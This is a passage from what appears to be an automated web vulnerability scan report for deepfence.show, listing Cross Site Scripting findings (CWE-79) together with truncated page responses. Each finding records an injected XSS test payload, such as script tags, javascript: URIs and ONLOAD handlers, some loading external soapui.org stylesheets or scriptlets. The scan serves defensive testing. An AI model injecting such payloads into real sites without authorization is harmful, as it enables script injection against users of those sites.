href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #251\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #252\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \\\";alert('XSS');//\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79Issue Number #253\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #254\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #255\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BODY BACKGROUND=\"javascript:alert('XSS')\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #256\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BODY ONLOAD=alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #257\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG DYNSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #258\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG LOWSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #259\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# <BGSOUND SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #260\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BR SIZE=\"&{alert('XSS')}\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the responseCWE-ID CWE-79\nIssue Number #261\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <LAYER SRC=\"http://soapui.org/scriptlet.html\"></LAYER\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #262\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #263\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <LINK REL=\"stylesheet\" HREF=\"http://soapui.org/xss.css\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #264\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <STYLE>@import'http://soapui.org/xss.css';</STYLE\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 